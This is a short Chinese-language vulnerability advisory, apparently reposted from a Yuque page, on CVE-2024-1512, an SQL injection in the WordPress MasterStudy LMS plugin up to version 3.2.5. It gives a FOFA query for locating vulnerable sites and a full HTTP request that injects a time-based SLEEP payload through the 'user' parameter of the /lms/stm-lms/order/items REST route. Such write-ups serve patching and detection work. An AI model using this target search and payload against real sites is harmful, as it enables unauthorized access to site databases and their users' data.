登录 白背景

WordPress MasterStudy LMS插件存在SQL(CVE-2024-1512)

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(38, 38, 38);">wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Plugin MasterStudy LMS WordPress Plugin 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过/lms/stm-lms/order/items REST路由的 user参数进行基于联合的SQL注入。</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

  • <font style="color:rgb(38, 38, 38);">WordPress Plugin MasterStudy LMS WordPress Plugin <=3.2.5 </font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

  • fofabody="wp-content/plugins/masterstudy-lms-learning-management-system/"
  • 特征

1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676.png

四、漏洞复现

<font style="color:rgb(38, 38, 38);">发送数据包,执行SQL语句,延时3秒,执行两次,延时6秒 </font>

GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%283%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

1715324391387-3bdb742d-62e7-4f1d-9fca-d08e88d8daf6.png

原文: https://www.yuque.com/xiaokp7/ocvun2/inmhqzhmsq4u7n45